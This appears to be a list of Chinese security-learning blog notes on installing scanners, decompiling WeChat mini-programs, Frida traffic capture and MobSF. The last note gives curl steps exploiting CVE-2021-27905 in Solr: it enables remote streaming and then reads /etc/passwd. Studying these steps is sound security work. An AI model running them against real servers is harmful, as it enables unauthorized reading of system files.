【笔记】SBActuator学习笔记
前言通过rabbitmask/SB-Actuator实现Java的SpringBoot框架未授权访问漏洞、XXE漏洞、RCE漏洞检测
下载项目12git clone https://github.com/rabbitmask/SB-Actuator.gitcd SB-Actuator
漏洞检测1java -jar SB-Actuator.jar -u http://<ip>:<port>
完成
【笔记】JVM的OQL
前言JVM的OQL
模糊搜索关键字
<str>:关键字
1select s from java.lang.String s where /<str>/.test(s.value.toString())
完成
【笔记】微信小程序反编译
前言微信小程序反编译
下载项目12git clone https://github.com/sanriqing/WxAppUnpacker.gitcd WxAppUnpacker
下载依赖12rm -f package-lock.jsonnpm install
获取微信小程序的包传送门
反编译微信小程序的包
<base_dir>:项目根目录
进入项目目录下反编译
-s=<base_dir>:指定项目根目录
1node wuWxapkg.js <file_name>.wxapkg
完成
【笔记】获取微信小程序APPID和打包后的wxapkg包文件
前言获取微信小程序APPID和打包后的wxapkg包文件
Windows
~\Documents\Wechat Files\Applet
MacOS
~/Library/Containers/com.tencent.xinWeChat/Data/.wxapplet/packages
Android
Android上不能通过目录名获得小程序APPID
/data/data/com.tencent.mm/MicroMsg/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/appboard/pkg
完成参考文献简书——虚无void腾讯云开发者社区——乌鸦安全
【笔记】Encrypto命令行工具
前言使用MacPaw Encrypto官方的命令行工具加解密文件,等同于使用 Mac App Store 的Encrypto.app加解密
下载项目1234wget https://github.com/MacPaw/homebrew-taps/raw/binaries/encrypto-cli.bundle-0.0.1.zipunzip encrypto-cli.bundle-0.0.1.zipmv encrypto-cli/encrypto-cli.bundle ./rm -rf encrypto-cli
加密文件
<file_name>:指定未加密的文件--output ./:指定输出目录
1encrypto-cli.bundle/Contents/MacOS/encrypto-cli encrypt <file_name> --output ./
定义提示信息和密码
12345Enter hint 👉 Enter password 🤐 Verify password 🕵 encrypto-cli: 🤔 encrypting. ...
【笔记】Android四层协议和五层协议抓包
前言利用frida/frida和r0ysue/r0capture实现Android四层协议和五层协议抓包
Frida环境配置
Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.(Github)
用于将Android的TCP端口转发到PC的TCP端口
下载项目12git clone https://github.com/frida/frida.gitcd frida
下载依赖创建虚拟环境12python3 -m venv venvsource venv/bin/activate
下载工集1pip3 install frida-tools
下载Client1pip3 install frida
手动指定版本
为了与Server版本保持一致,可以手动指定版本
1pip3 install frida==16.3.3
下载对应版本的查看Android的架构1adb shell getprop ro.product.cpu.ab ...
【笔记】通过Docker部署MobSF
前言通过Docker部署MobSF实现移动安全分析平台
通过Docker部署1docker run -d --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
完成
截图纪念
【笔记】PackerFuzzer学习笔记
前言一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具(Github)
下载项目12git clone https://github.com/rtcatc/Packer-Fuzzer.gitcd Packer-Fuzzer
下载依赖123python3 -m venv venvsource venv/bin/activatepip3 install -r requirements.txt
测试JS中的信息泄漏1python3 PackerFuzzer.py -u <url>
完成
【笔记】SwaggerHack学习笔记
前言批量测试Swagger中出现的API接口
下载项目12git clone https://github.com/jayus0821/swagger-hack.gitcd swagger-hack
源代码swagger-hack.py1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621 ...
【笔记】CVE-2021-27905漏洞利用
前言Java的Solr框架利用SSRF实现任意文件读取漏洞利用
获取数据库名1curl http://<ip>:8983/solr/admin/cores?indexInfo=false&wt=json
触发
<database>:上一步获取的数据库名
1curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' $'http://<ip>:8983/solr/<database>/config'
读取文件
/etc/passwd:读取文件
1curl -i -s -k 'http://& ...